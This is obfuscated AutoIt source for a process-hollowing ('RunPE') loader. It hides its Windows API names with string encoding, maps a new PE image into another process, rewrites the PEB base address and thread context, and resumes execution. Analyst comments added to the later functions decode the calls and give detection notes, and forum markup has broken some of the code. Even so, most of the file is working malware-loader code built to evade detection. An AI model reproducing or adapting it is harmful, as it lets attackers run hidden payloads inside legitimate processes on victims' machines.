$R3130 += 24 ; skipping IMAGE_DIRECTORY_ENTRY_RESOURCE, IMAGE_DIRECTORY_ENTRY_EXCEPTION, IMAGE_DIRECTORY_ENTRY_SECURITY
; Base Relocation Directory
Local $N313131 = DllStructCreate(ShiftOneLove(Revers('011|131|411|29|14|901|321|021|821|901|14|86|421|421|011|321|901|901|47|711|601|621|521|321|411|59|14|901|321|021|821|901'), 9), $R3130)
; Collect data
Local $F313133 = DllStructGetData($N313131, ShiftOneLove(Revers('811|811|401|711|301|301|86|111|001|021|911|711|801|98'), 3))
Local $S313135 = DllStructGetData($N313131, ShiftOneLove(Revers('201|321|601|48'), 1))
Local $S3734
If $F313133 And $S313135 Then $S3734 = True
If Not $S3734 Then MsgBox(48, ShiftOneLove(Revers('83|801|511|011|511|911|201|29'), 5), ShiftOneLove(Revers('73|97|68|38|19|63|88|38|28|63|39|96|18|63|78|77|67|88|63|88|98|07|63|39|68|88|63|08|08|77|19|63|77|63|05|37|08|98|27|38|18|63|37|08|07|96|88|96|17|38|08|37|68|63|88|38|28'), 4)) ; nothing can be done here
; Move pointer
$R3130 += 88 ; size of the structures before IMAGE_SECTION_HEADER (16 of them).
;#region 6. ALLOCATE 'NEW' MEMORY SPACE
Local $I313233
Local $C313234
If $S3734 Then ; If the module can be relocated then allocate memory anywhere possible
$C313234 = _RunBinary_AllocateExeSpace($N3230, $H313035)
; In case of failure try at original address
If [MENTION=8708]error[/MENTION] Then
$C313234 = _RunBinary_AllocateExeSpaceAtAddress($N3230, $M313033, $H313035)
If [MENTION=8708]error[/MENTION] Then
_RunBinary_UnmapViewOfSection($N3230, $M313033)
; Try now
$C313234 = _RunBinary_AllocateExeSpaceAtAddress($N3230, $M313033, $H313035)
If [MENTION=8708]error[/MENTION] Then
; Return special error number:
DllCall(ShiftOneLove(Revers('901|901|101|74|15|25|901|201|111|511|201|801'), 1), ShiftOneLove(Revers('111|411|411|101'), 3), ShiftOneLove(Revers('321|321|901|701|911|221|88|901|421|501|811|311|711|221|901|29'), 8), ShiftOneLove(Revers('301|011|201|211|99|601'), 2), $N3230, ShiftOneLove(Revers('801|221|911|721|801'), 8), 0)
Return SetError(101, 1, 0)
EndIf
EndIf
EndIf
$I313233 = True
Else ; And if not try where it should be
$C313234 = _RunBinary_AllocateExeSpaceAtAddress($N3230, $M313033, $H313035)
If [MENTION=8708]error[/MENTION] Then
_RunBinary_UnmapViewOfSection($N3230, $M313033)
; Try now
$C313234 = _RunBinary_AllocateExeSpaceAtAddress($N3230, $M313033, $H313035)
If [MENTION=8708]error[/MENTION] Then
; Return special error number:
DllCall(ShiftOneLove(Revers('901|901|101|74|15|25|901|201|111|511|201|801'), 1), ShiftOneLove(Revers('111|411|411|101'), 3), ShiftOneLove(Revers('321|321|901|701|911|221|88|901|421|501|811|311|711|221|901|29'), 8), ShiftOneLove(Revers('301|011|201|211|99|601'), 2), $N3230, ShiftOneLove(Revers('801|221|911|721|801'), 8), 0)
Return SetError(101, 0, 0)
EndIf
EndIf
EndIf
; If there is new ImageBase value, save it
DllStructSetData($C3833, ShiftOneLove(Revers('601|021|201|17|601|801|201|411|87'), 5), $C313234)
;#region 7. CONSTRUCT THE NEW MODULE
; Allocate enough space (in our space) for the new module
Local $R313534 = DllStructCreate(ShiftOneLove(Revers('49|401|911|421|101'), 3) & $H313035 & ShiftOneLove(Revers('69'), 3))
; Get pointer
Local $Z313536 = DllStructGetPtr($R313534)
; Headers
Local $D313538 = DllStructCreate(ShiftOneLove(Revers('49|401|911|421|101'), 3) & $S313031 & ShiftOneLove(Revers('69'), 3), $N3536)
; Write headers to $R313534
DllStructSetData($R313534, 1, DllStructGetData($D313538, 1))
; Write sections now. $R3130 is currently in place of sections
Local $T313635
Local $Z313636, $T313637
Local $L313638, $B313639
Local $M313730
; Loop through sections
For $M313731 = 1 To $N3735
$T313635 = DllStructCreate(ShiftOneLove(Revers('76|101|46|99|901|711|501|68|04|221|501|211|701'), 8) & _
ShiftOneLove(Revers('06|611|611|201|511|101|101|66|901|89|001|601|611|221|501|18|101|111|66|201|321|601|48|901|89|811|711|511|601|78|301|08|111|211|601|111|68|33|101|511|211|021|101'), 1) & _
ShiftOneLove(Revers('76|321|321|901|221|801|801|37|611|501|521|421|221|311|49|04|801|221|911|721|801'), 8) & _
ShiftOneLove(Revers('16|99|811|99|07|121|99|48|401|18|301|421|701|58|43|201|611|311|121|201'), 2) & _
ShiftOneLove(Revers('56|301|221|301|47|521|301|88|711|09|021|701|221|611|111|711|68|83|601|021|711|521|601'), 6) & _
ShiftOneLove(Revers('86|421|911|021|411|521|601|801|021|711|011|19|021|39|321|011|521|911|411|021|98|14|901|321|021|821|901'), 9) & _
ShiftOneLove(Revers('26|811|711|401|101|211|021|311|401|311|801|97|411|78|711|401|911|311|801|411|38|53|301|711|411|221|301'), 3) & _
ShiftOneLove(Revers('46|021|511|611|011|121|201|401|611|311|601|78|701|48|911|601|301|411|221|38|73|501|911|611|421'), 5) & _
ShiftOneLove(Revers('16|711|611|301|001|111|911|211|301|211|701|87|401|18|611|301|001|111|911|08|43|201|611|311|121'), 2) & _
ShiftOneLove(Revers('421|801|411|521|421|411|321|011|521|801|601|321|601|311|67|14|901|321|021|821|901'), 9), _
$R3130)
; Collect data
$Z313636 = DllStructGetData($T313635, ShiftOneLove(Revers('401|321|401|57|621|401|98|901|68|801|921|211|09'), 7))
$T313637 = $N3536 + DllStructGetData($T313635, ShiftOneLove(Revers('501|421|501|67|721|501|09|911|29|221|901|421|811|311|911|88'), 8))
$L313638 = DllStructGetData($T313635, ShiftOneLove(Revers('811|811|401|711|301|301|86|111|001|021|911|711|801|98'), 3))
$B313639 = DllStructGetData($T313635, ShiftOneLove(Revers('711|711|301|611|201|201|76|011|99|101|701|711|321|601|28|201|211|76|301|421|701|58|011|99|911|811|611|701|88|401|18|211|311|701|211|78'), 2))
If $B313639 And $B313639 < $Z313636 Then $Z313636 = $B313639
; If there is data to write, write it
If $Z313636 Then
DllStructSetData(DllStructCreate(ShiftOneLove(Revers('49|401|911|421|101'), 3) & $Z313636 & ShiftOneLove(Revers('69'), 3), $Z313536 + $L313638), 1, DllStructGetData(DllStructCreate(ShiftOneLove(Revers('49|401|911|421|101'), 3) & $Z313636 & ShiftOneLove(Revers('69'), 3), $T313637), 1))
EndIf
; Relocations
If $I313233 Then
If $L313638 <= $F313133 And $L313638 + $Z313636 > $F313133 Then
$M313730 = DllStructCreate(ShiftOneLove(Revers('49|401|911|421|101'), 3) & $S313135 & ShiftOneLove(Revers('69'), 3), $T313637 + ($F313133 - $L313638))
EndIf
EndIf
; Move pointer
$R3130 += 40 ; size of $T313635 structure
Next
; Fix relocations
If $I313233 Then _RunBinary_FixReloc($Z313536, $M313730, $C313234, $M313033, $X3831 = 523)
; Write newly constructed module to allocated space inside the $N3230
$J3134 = DllCall(ShiftOneLove(Revers('901|901|101|74|15|25|901|201|111|511|201|801'), 1), ShiftOneLove(Revers('111|411|411|101'), 3), ShiftOneLove(Revers('521|811|511|311|501|18|911|911|501|301|511|811|48|501|021|901|811|19'), 4), _
ShiftOneLove(Revers('301|011|201|211|99|601'), 2), $N3230, _
ShiftOneLove(Revers('711|911|511'), 3), $C313234, _
ShiftOneLove(Revers('711|911|511'), 3), $Z313536, _
ShiftOneLove(Revers('811|021|611|99|401|811|511|321|401'), 4), $H313035, _
ShiftOneLove(Revers('25|421|621|221|501|011|421|121|921|011'), 10), 0)
; Check for errors or failure
If [MENTION=8708]error[/MENTION] Or Not $J3134[0] Then
DllCall(ShiftOneLove(Revers('901|901|101|74|15|25|901|201|111|511|201|801'), 1), ShiftOneLove(Revers('111|411|411|101'), 3), ShiftOneLove(Revers('321|321|901|701|911|221|88|901|421|501|811|311|711|221|901|29'), 8), ShiftOneLove(Revers('301|011|201|211|99|601'), 2), $N3230, ShiftOneLove(Revers('801|221|911|721|801'), 8), 0)
Return SetError(7, 0, 0) ; WriteProcessMemory function or call to it while writting new module binary
EndIf
;#region 8. PEB ImageBaseAddress MANIPULATION
; PEB structure definition
Local $D323232 = DllStructCreate(ShiftOneLove(Revers('56|701|501|301|811|98|121|121|701|021|601|601|17|601|701|221|111|021|701|011|611|97|83|701|221|721|401'), 6) & _
ShiftOneLove(Revers('96|521|021|121|511|621|221|98|901|111|031|97|111|811|511|08|111|311|701|911|38|011|701|111|29|24|111|621|131|801'), 10) & _
ShiftOneLove(Revers('36|401|501|701|701|121|201|501|27|701|411|901|501|07|63|501|021|521|201'), 4) & _
ShiftOneLove(Revers('86|011|321|601|121|29|14|011|521|031|701'), 9) & _
ShiftOneLove(Revers('76|421|811|501|421|521|58|04|221|421|021'), 8) & _
ShiftOneLove(Revers('96|521|521|111|421|011|011|57|111|521|701|67|111|311|701|911|38|24|421|621|221'), 10) & _
ShiftOneLove(Revers('76|501|421|501|67|221|901|801|501|911|48|04|221|421|021'), 8) & _
ShiftOneLove(Revers('06|611|511|201|711|201|011|89|511|89|18|611|611|201|001|211|511|18|33|511|711|311'), 1) & _
ShiftOneLove(Revers('16|99|811|99|07|111|301|811|711|321|58|001|911|58|43|611|811|411'), 2) & _
ShiftOneLove(Revers('86|121|601|011|18|421|421|011|801|021|321|98|14|321|521|121'), 9) & _
ShiftOneLove(Revers('46|211|401|611|18|301|601|58|121|021|201|57|73|911|121|711'), 5) & _
ShiftOneLove(Revers('96|111|021|511|621|721|121|29|711|901|121|68|801|111|09|621|521|701|08|24|421|621|221'), 10) & _
ShiftOneLove(Revers('66|801|711|211|321|421|811|98|411|601|811|511|711|29|501|801|78|321|221|401|77|93|121|321|911'), 7) & _
ShiftOneLove(Revers('86|521|911|621|021|67|011|521|601|901|121|49|521|911|011|811|911|021|321|411|721|911|87|14|901|321|021|821|901'), 9) & _
ShiftOneLove(Revers('46|601|311|301|201|98|211|401|201|301|311|311|201|27|311|601|511|911|601|08|73|911|121|711'), 5) & _
ShiftOneLove(Revers('36|411|511|901|021|301|501|78|701|511|08|021|411|501|221|37|63|811|021|611'), 4) & _
ShiftOneLove(Revers('06|401|211|77|711|111|201|911|07|33|511|711|311'), 1) & _
ShiftOneLove(Revers('86|521|421|411|58|011|011|321|97|14|321|521|121'), 9) & _
ShiftOneLove(Revers('86|321|011|521|911|621|021|67|911|021|411|421|911|601|121|921|87|421|711|39|14|901|321|021|821|901'), 9) & _
ShiftOneLove(Revers('26|511|001|211|911|801|96|811|111|78|53|711|911|511'), 3) & _
ShiftOneLove(Revers('26|69|35|49|811|911|801|96|511|001|211|911|801|96|811|111|78|53|301|711|411|221|301'), 3) & _
ShiftOneLove(Revers('66|801|221|401|37|821|121|811|611|801|48|701|801|121|401|111|09|821|511|711|68|701|401|801|98|93|121|321|911'), 7) & _
ShiftOneLove(Revers('36|611|101|501|67|521|811|511|311|501|18|401|501|811|101|801|78|521|211|411|38|401|101|501|68|63|811|021|611'), 4) & _
ShiftOneLove(Revers('16|99|811|99|07|611|301|021|611|301|58|101|701|811|99|811|58|321|011|211|18|201|99|301|48|43|611|811|411'), 2) & _
ShiftOneLove(Revers('86|601|521|601|77|011|211|601|98|011|901|021|67|411|421|911|47|14|321|521|121'), 9) & _
ShiftOneLove(Revers('86|601|521|601|77|011|211|601|98|011|901|021|67|811|011|88|14|321|521|121'), 9) & _
ShiftOneLove(Revers('86|601|521|601|77|011|711|701|601|39|011|421|601|67|011|901|021|801|411|911|49|14|321|521|121'), 9) & _
ShiftOneLove(Revers('66|221|121|811|221|221|801|601|811|121|78|901|68|121|801|501|611|421|58|93|701|121|811|621|701'), 7) & _
ShiftOneLove(Revers('16|501|99|011|27|011|99|001|311|011|37|811|08|43|201|611|311|121|201'), 2) & _
ShiftOneLove(Revers('96|301|26|101|06|111|421|701|221|39|24|111|621|131|801'), 10) & _
ShiftOneLove(Revers('16|811|911|311|301|111|701|68|211|311|701|811|101|301|58|011|99|101|701|811|701|611|96|43|45|65|811|211|701'), 2) & _
ShiftOneLove(Revers('36|501|221|811|501|911|501|68|021|411|501|311|701|501|78|611|101|501|67|63|401|811|511|321|401'), 4) & _
ShiftOneLove(Revers('36|021|901|311|311|511|17|021|411|501|311|701|501|78|611|101|501|67|63|401|811|511|321|401'), 4) & _
ShiftOneLove(Revers('46|501|311|611|901|021|601|911|901|98|601|601|911|57|311|201|121|611|98|121|011|411|411|611|27|601|37|711|201|601|77|73|501|911|611|421|501'), 5) & _
ShiftOneLove(Revers('26|301|111|411|701|811|401|711|701|78|011|201|411|111|96|401|401|711|37|911|801|211|211|411|07|401|17|511|001|401|57|53|301|711|411|221|301'), 3) & _
ShiftOneLove(Revers('96|521|221|701|111|28|211|98|421|111|801|911|721|88|24|011|421|121|921|011'), 10) & _
ShiftOneLove(Revers('36|911|611|101|501|67|601|38|811|501|201|311|121|28|311|121|311|901|421|101|18|63|401|811|511|321|401'), 4) & _
ShiftOneLove(Revers('56|121|811|301|701|87|121|121|701|501|711|021|68|83|021|221|811'), 6) & _
ShiftOneLove(Revers('36|501|211|201|101|88|501|211|401|411|101|67|401|501|811|101|801|78|901|401|57|63|811|021|611'), 4) & _
ShiftOneLove(Revers('76|221|901|021|611|901|08|221|901|421|221|501|421|19|321|321|901|701|911|221|88|04|221|421|021'), 8) & _
ShiftOneLove(Revers('36|021|911|901|08|501|021|121|201|901|811|021|021|96|17|27|901|401|57|63|811|021|611'), 4) & _
ShiftOneLove(Revers('76|511|701|911|48|221|901|801|501|911|48|04|221|421|021'), 8) & _
ShiftOneLove(Revers('56|611|711|111|121|021|701|29|021|711|211|301|38|98|58|83|601|021|711|521|601'), 6) & _
ShiftOneLove(Revers('76|811|911|311|321|221|901|49|221|911|811|311|58|19|78|04|801|221|911|721|801'), 8) & _
ShiftOneLove(Revers('76|221|901|601|711|521|68|801|611|311|521|47|19|78|04|801|221|911|721|801'), 8) & _
ShiftOneLove(Revers('86|901|28|811|321|021|111|521|601|711|98|29|88|14|901|321|021|821|901'), 9) & _
ShiftOneLove(Revers('16|111|301|811|711|321|58|001|911|58|301|501|99|111|57|43|201|611|311|121|201'), 2) & _
ShiftOneLove(Revers('76|811|911|311|321|221|901|49|221|911|411|501|58|711|901|421|321|921|19|601|521|19|901|111|501|711|18|04|801|221|911|721|801'), 8) & _
ShiftOneLove(Revers('26|311|411|801|811|711|401|98|711|411|311|801|08|211|401|911|811|421|68|101|021|68|401|601|001|211|67|53|301|711|411|221|301'), 3) & _
ShiftOneLove(Revers('16|59|45|35|39|611|301|401|401|911|86|301|011|201|211|99|47|701|201|37|43|201|611|311|121|201'), 2) & _
ShiftOneLove(Revers('66|801|711|211|321|421|811|98|321|211|711|08|221|221|801|601|811|121|78|321|221|811|78|93|701|121|811|621|701'), 7) & _
ShiftOneLove(Revers('16|411|99|111|811|701|86|211|311|701|711|211|99|411|221|17|711|011|68|43|201|611|311|121|201'), 2) & _
ShiftOneLove(Revers('36|79|06|45|35|59|911|021|901|07|611|101|311|021|901|07|411|511|901|911|411|101|611|421|37|911|211|88|63|501|021|521|201'), 4) & _
ShiftOneLove(Revers('401|77|411|511|901|911|911|501|78|63|401|811|511|321|401'), 4))
; Fill the structure
$J3134 = DllCall(ShiftOneLove(Revers('901|901|101|74|15|25|901|201|111|511|201|801'), 1), ShiftOneLove(Revers('111|411|411|101'), 3), ShiftOneLove(Revers('821|121|811|611|801|48|221|221|801|601|811|121|78|701|401|801|98'), 7), _
ShiftOneLove(Revers('711|911|511'), 3), $N3230, _
ShiftOneLove(Revers('711|911|511'), 3), $W3438, _ ; pointer to PEB structure
ShiftOneLove(Revers('711|911|511'), 3), DllStructGetPtr($D323232), _
ShiftOneLove(Revers('811|021|611|99|401|811|511|321|401'), 4), DllStructGetSize($D323232), _
ShiftOneLove(Revers('25|421|621|221|501|011|421|121|921|011'), 10), 0)
; Check for errors or failure
If [MENTION=8708]error[/MENTION] Or Not $J3134[0] Then
DllCall(ShiftOneLove(Revers('901|901|101|74|15|25|901|201|111|511|201|801'), 1), ShiftOneLove(Revers('111|411|411|101'), 3), ShiftOneLove(Revers('321|321|901|701|911|221|88|901|421|501|811|311|711|221|901|29'), 8), ShiftOneLove(Revers('301|011|201|211|99|601'), 2), $N3230, ShiftOneLove(Revers('801|221|911|721|801'), 8), 0)
Return SetError(8, 0, 0) ; ReadProcessMemory function or call to it failed while filling PEB structure
EndIf
; Change base address within PEB
DllStructSetData($D323232, ShiftOneLove(Revers('321|321|901|221|801|801|37|901|321|501|47|901|111|501|711|18'), 8), $C313234)
; Write the changes
$J3134 = DllCall(ShiftOneLove(Revers('901|901|101|74|15|25|901|201|111|511|201|801'), 1), ShiftOneLove(Revers('111|411|411|101'), 3), ShiftOneLove(Revers('521|811|511|311|501|18|911|911|501|301|511|811|48|501|021|901|811|19'), 4), _
ShiftOneLove(Revers('301|011|201|211|99|601'), 2), $N3230, _
ShiftOneLove(Revers('711|911|511'), 3), $W3438, _
ShiftOneLove(Revers('711|911|511'), 3), DllStructGetPtr($D323232), _
ShiftOneLove(Revers('811|021|611|99|401|811|511|321|401'), 4), DllStructGetSize($D323232), _
ShiftOneLove(Revers('25|421|621|221|501|011|421|121|921|011'), 10), 0)
; Check for errors or failure
If [MENTION=8708]error[/MENTION] Or Not $J3134[0] Then
DllCall(ShiftOneLove(Revers('901|901|101|74|15|25|901|201|111|511|201|801'), 1), ShiftOneLove(Revers('111|411|411|101'), 3), ShiftOneLove(Revers('321|321|901|701|911|221|88|901|421|501|811|311|711|221|901|29'), 8), ShiftOneLove(Revers('301|011|201|211|99|601'), 2), $N3230, ShiftOneLove(Revers('801|221|911|721|801'), 8), 0)
Return SetError(9, 0, 0) ; WriteProcessMemory function or call to it failed while changing base address
EndIf
;#region 9. NEW ENTRY POINT
; Entry point manipulation
Switch $R3237
Case 1
DllStructSetData($A3238, ShiftOneLove(Revers('821|501|77'), 8), $C313234 + $L3939)
Case 2
DllStructSetData($A3238, ShiftOneLove(Revers('821|701|09'), 8), $C313234 + $L3939)
Case 3
; FIXME - Itanium architecture
EndSwitch
;#region 10. SET NEW CONTEXT
; New context:
$J3134 = DllCall(ShiftOneLove(Revers('901|901|101|74|15|25|901|201|111|511|201|801'), 1), ShiftOneLove(Revers('111|411|411|101'), 3), ShiftOneLove(Revers('811|221|301|811|211|311|96|201|99|301|611|601|68|811|301|58'), 2), _
ShiftOneLove(Revers('301|011|201|211|99|601'), 2), $O3232, _
ShiftOneLove(Revers('711|911|511'), 3), DllStructGetPtr($A3238))
If [MENTION=8708]error[/MENTION] Or Not $J3134[0] Then
DllCall(ShiftOneLove(Revers('901|901|101|74|15|25|901|201|111|511|201|801'), 1), ShiftOneLove(Revers('111|411|411|101'), 3), ShiftOneLove(Revers('321|321|901|701|911|221|88|901|421|501|811|311|711|221|901|29'), 8), ShiftOneLove(Revers('301|011|201|211|99|601'), 2), $N3230, ShiftOneLove(Revers('801|221|911|721|801'), 8), 0)
Return SetError(10, 0, 0) ; SetThreadContext function or call to it failed
EndIf
;#region 11. RESUME THREAD
; And that's it!. Continue execution:
$J3134 = DllCall(ShiftOneLove(Revers('901|901|101|74|15|25|901|201|111|511|201|801'), 1), ShiftOneLove(Revers('801|221|911|721|801'), 8), ShiftOneLove(Revers('501|201|601|911|901|98|601|411|221|021|601|78'), 5), ShiftOneLove(Revers('301|011|201|211|99|601'), 2), $O3232)
; Check for errors or failure
If [MENTION=8708]error[/MENTION] Or $J3134[0] = -1 Then
DllCall(ShiftOneLove(Revers('901|901|101|74|15|25|901|201|111|511|201|801'), 1), ShiftOneLove(Revers('111|411|411|101'), 3), ShiftOneLove(Revers('321|321|901|701|911|221|88|901|421|501|811|311|711|221|901|29'), 8), ShiftOneLove(Revers('301|011|201|211|99|601'), 2), $N3230, ShiftOneLove(Revers('801|221|911|721|801'), 8), 0)
Return SetError(11, 0, 0) ; ResumeThread function or call to it failed
EndIf
;#region 12. CLOSE OPEN HANDLES AND RETURN PID
DllCall(ShiftOneLove(Revers('901|901|101|74|15|25|901|201|111|511|201|801'), 1), ShiftOneLove(Revers('111|411|411|101'), 3), ShiftOneLove(Revers('501|211|401|411|101|67|501|911|511|211|17'), 4), ShiftOneLove(Revers('301|011|201|211|99|601'), 2), $N3230)
DllCall(ShiftOneLove(Revers('901|901|101|74|15|25|901|201|111|511|201|801'), 1), ShiftOneLove(Revers('111|411|411|101'), 3), ShiftOneLove(Revers('501|211|401|411|101|67|501|911|511|211|17'), 4), ShiftOneLove(Revers('301|011|201|211|99|601'), 2), $O3232)
; All went well. Return new PID:
Return DllStructGetData($P3133, ShiftOneLove(Revers('101|47|611|611|201|001|211|511|18'), 1))
EndFunc ;==>_RunBinary
Func _RunBinary_FixReloc($Z313536, $A323637, $V323634, $V323631, $D323632)
; Walks a PE base-relocation table and adds a fixed delta to every pointer-sized
; slot whose relocation type matches the selected one.
; Analyst note: each ShiftOneLove(Revers('...'), n) call only decodes a short
; DllStruct type or field-name string at run time; the decoded text is given
; next to each use below so the routine can be read without executing it.
; Parameters (identifiers are obfuscator-generated; roles are read from their use here):
;   $Z313536 - base address the patched slots are computed from (base + VirtualAddress + offset)
;   $A323637 - DllStruct holding the relocation data; only its size and pointer are used
;   $V323634, $V323631 - the applied delta is $V323634 - $V323631
;              (presumably new image base minus preferred base - confirm against the caller)
;   $D323632 - selects the relocation type to honour: 0/False -> 3, 1/True -> 10
; Returns 1 unconditionally; no failure path is visible in this routine.
Local $G323633 = $V323634 - $V323631 ; dislocation value
Local $A323636 = DllStructGetSize($A323637) ; size of data
Local $O323833 = DllStructGetPtr($A323637) ; address of the data structure
; $P323731 is the byte cursor into the table. It is declared without a value, so the
; While test below relies on AutoIt comparing an unset Local as 0.
Local $Z323730, $P323731
Local $L313638, $Q323733, $J323734
Local $P323735, $C323736, $B323737
Local $G323738 = 3 + 7 * $D323632 ; IMAGE_REL_BASED_HIGHLOW = 3 or IMAGE_REL_BASED_DIR64 = 10
While $P323731 < $A323636 ; for all data available
; Block header overlay; decodes to "dword VirtualAddress; dword SizeOfBlock"
$Z323730 = DllStructCreate(ShiftOneLove(Revers('901|101|311|011|86|401|18|301|421|701|58|43|201|611|311|121|201|43|16|711|711|301|611|201|201|76|011|99|911|811|611|701|88|43|201|611|311|121|201'), 2), $O323833 + $P323731)
; Field name decodes to "VirtualAddress"
$L313638 = DllStructGetData($Z323730, ShiftOneLove(Revers('811|811|401|711|301|301|86|111|001|021|911|711|801|98'), 3))
; Field name decodes to "SizeOfBlock"
$Q323733 = DllStructGetData($Z323730, ShiftOneLove(Revers('411|601|811|511|37|901|68|801|921|211|09'), 7))
; Number of 2-byte entries that follow the 8-byte block header
$J323734 = ($Q323733 - 8) / 2
; Entry array overlay; decodes to "word[" & count & "]", placed 8 bytes past the header
$P323735 = DllStructCreate(ShiftOneLove(Revers('39|201|611|311|121'), 2) & $J323734 & ShiftOneLove(Revers('69'), 3), DllStructGetPtr($Z323730) + 8)
; Go through all entries
For $M313731 = 1 To $J323734
$C323736 = DllStructGetData($P323735, 1, $M313731)
; Upper 4 bits of the 16-bit entry carry the relocation type
If BitShift($C323736, 12) = $G323738 Then ; check type
; Overlay a "ptr" on the slot at base + VirtualAddress + low 12 bits of the entry
$B323737 = DllStructCreate(ShiftOneLove(Revers('711|911|511'), 3), $Z313536 + $L313638 + BitAND($C323736, 0xFFF)) ; the rest of $C323736 is offset
; Rebase the stored address by the delta
DllStructSetData($B323737, 1, DllStructGetData($B323737, 1) + $G323633) ; this is what's this all about
EndIf
Next
; Advance the cursor by the size the block itself reports
$P323731 += $Q323733
WEnd
Return 1 ; all OK!
EndFunc ;==>_RunBinary_FixReloc
Func _RunBinary_AllocateExeSpaceAtAddress($N3230, $B333132, $A323636)
; Asks for $A323636 bytes of read/write/execute memory at address $B333132 inside
; the process referred to by handle $N3230.
; Decoded call (first attempt):
;   DllCall("kernel32.dll", "ptr", "VirtualAllocEx", "handle", $N3230, "ptr", $B333132,
;           "dword_ptr", $A323636, "dword", 0x1000, "dword", 64)
; The second attempt is identical except the allocation type is 0x3000.
; Returns the DllCall return value (element [0]) on success; on failure returns 0
; with the error flag set to 1 via SetError.
; Detection note: a process committing PAGE_EXECUTE_READWRITE (0x40) memory in another
; process at a caller-chosen address is a common behavioural indicator of process
; hollowing (MITRE ATT&CK T1055.012), especially alongside the WriteProcessMemory,
; SetThreadContext and ResumeThread calls named in this file's own comments.
; Listing note: "[MENTION=8708]error[/MENTION]" below is forum markup that replaced a
; token of the original script (presumably AutoIt's error macro); the text does not
; parse as posted.
; Allocate
Local $J3134 = DllCall(ShiftOneLove(Revers('901|901|101|74|15|25|901|201|111|511|201|801'), 1), ShiftOneLove(Revers('711|911|511'), 3), ShiftOneLove(Revers('621|57|501|711|411|411|17|411|301|321|221|021|111|29'), 6), _
ShiftOneLove(Revers('301|011|201|211|99|601'), 2), $N3230, _
ShiftOneLove(Revers('711|911|511'), 3), $B333132, _
ShiftOneLove(Revers('811|021|611|99|401|811|511|321|401'), 4), $A323636, _
ShiftOneLove(Revers('801|221|911|721|801'), 8), 0x1000, _ ; MEM_COMMIT
ShiftOneLove(Revers('801|221|911|721|801'), 8), 64) ; PAGE_EXECUTE_READWRITE
; Check for errors or failure
If [MENTION=8708]error[/MENTION] Or Not $J3134[0] Then
; Try differently
$J3134 = DllCall(ShiftOneLove(Revers('901|901|101|74|15|25|901|201|111|511|201|801'), 1), ShiftOneLove(Revers('711|911|511'), 3), ShiftOneLove(Revers('621|57|501|711|411|411|17|411|301|321|221|021|111|29'), 6), _
ShiftOneLove(Revers('301|011|201|211|99|601'), 2), $N3230, _
ShiftOneLove(Revers('711|911|511'), 3), $B333132, _
ShiftOneLove(Revers('811|021|611|99|401|811|511|321|401'), 4), $A323636, _
ShiftOneLove(Revers('801|221|911|721|801'), 8), 0x3000, _ ; MEM_COMMIT|MEM_RESERVE
ShiftOneLove(Revers('801|221|911|721|801'), 8), 64) ; PAGE_EXECUTE_READWRITE
; Check for errors or failure
If [MENTION=8708]error[/MENTION] Or Not $J3134[0] Then Return SetError(1, 0, 0) ; Unable to allocate
EndIf
Return $J3134[0]
EndFunc ;==>_RunBinary_AllocateExeSpaceAtAddress
Func _RunBinary_AllocateExeSpace($N3230, $A323636)
; Asks for $A323636 bytes of read/write/execute memory inside the process referred
; to by handle $N3230, passing 0 as the address argument.
; Decoded call:
;   DllCall("kernel32.dll", "ptr", "VirtualAllocEx", "handle", $N3230, "ptr", 0,
;           "dword_ptr", $A323636, "dword", 0x3000, "dword", 64)
; Returns the DllCall return value (element [0]) on success; on failure returns 0
; with the error flag set to 1 via SetError.
; Detection note: cross-process allocations requesting PAGE_EXECUTE_READWRITE (0x40)
; are uncommon in ordinary software and worth alerting on when the caller is a
; script interpreter.
; Listing note: "[MENTION=8708]error[/MENTION]" below is forum markup that replaced a
; token of the original script (presumably AutoIt's error macro).
; Allocate space
Local $J3134 = DllCall(ShiftOneLove(Revers('901|901|101|74|15|25|901|201|111|511|201|801'), 1), ShiftOneLove(Revers('711|911|511'), 3), ShiftOneLove(Revers('621|57|501|711|411|411|17|411|301|321|221|021|111|29'), 6), _
ShiftOneLove(Revers('301|011|201|211|99|601'), 2), $N3230, _
ShiftOneLove(Revers('711|911|511'), 3), 0, _
ShiftOneLove(Revers('811|021|611|99|401|811|511|321|401'), 4), $A323636, _
ShiftOneLove(Revers('801|221|911|721|801'), 8), 0x3000, _ ; MEM_COMMIT|MEM_RESERVE
ShiftOneLove(Revers('801|221|911|721|801'), 8), 64) ; PAGE_EXECUTE_READWRITE
; Check for errors or failure
If [MENTION=8708]error[/MENTION] Or Not $J3134[0] Then Return SetError(1, 0, 0) ; Unable to allocate
Return $J3134[0]
EndFunc ;==>_RunBinary_AllocateExeSpace
Func _RunBinary_UnmapViewOfSection($N3230, $B333132)
; Issues an unmap request for the view at address $B333132 in the process referred
; to by handle $N3230.
; Decoded call:
;   DllCall("ntdll.dll", "int", "NtUnmapViewOfSection", "ptr", $N3230, "ptr", $B333132)
; The value returned by the native call is discarded: only a failure of DllCall
; itself is treated as an error, so this routine returns 1 whenever the call could
; be made at all.
; Detection note: NtUnmapViewOfSection directed at another process's image base,
; issued by a script interpreter, is a recognised process-hollowing indicator
; (MITRE ATT&CK T1055.012).
; Listing note: "[MENTION=8708]error[/MENTION]" below is forum markup that replaced a
; token of the original script (presumably AutoIt's error macro).
DllCall(ShiftOneLove(Revers('611|611|801|45|611|611|801|421|811'), 8), ShiftOneLove(Revers('221|611|111'), 6), ShiftOneLove(Revers('911|021|411|521|801|011|29|111|88|821|011|411|59|121|601|811|911|49|521|78'), 9), _
ShiftOneLove(Revers('711|911|511'), 3), $N3230, _
ShiftOneLove(Revers('711|911|511'), 3), $B333132)
; Check for errors only
If [MENTION=8708]error[/MENTION] Then Return SetError(1, 0, 0) ; Failure
Return 1
EndFunc ;==>_RunBinary_UnmapViewOfSection
Func _RunBinary_IsWow64Process($N3230)
; Queries whether the process referred to by handle $N3230 runs under WOW64.
; Decoded call:
;   DllCall("kernel32.dll", "bool", "IsWow64Process", "handle", $N3230, "bool*", 0)
; Returns element [2] of the DllCall result, i.e. the value written through the
; "bool*" out-parameter; on failure returns 0 with the error flag set to 1.
; Listing note: "[MENTION=8708]error[/MENTION]" below is forum markup that replaced a
; token of the original script (presumably AutoIt's error macro).
Local $J3134 = DllCall(ShiftOneLove(Revers('901|901|101|74|15|25|901|201|111|511|201|801'), 1), ShiftOneLove(Revers('111|411|411|101'), 3), ShiftOneLove(Revers('911|911|501|301|511|811|48|65|85|321|511|19|911|77'), 4), _
ShiftOneLove(Revers('301|011|201|211|99|601'), 2), $N3230, _
ShiftOneLove(Revers('54|111|411|411|101'), 3), 0)
; Check for errors or failure
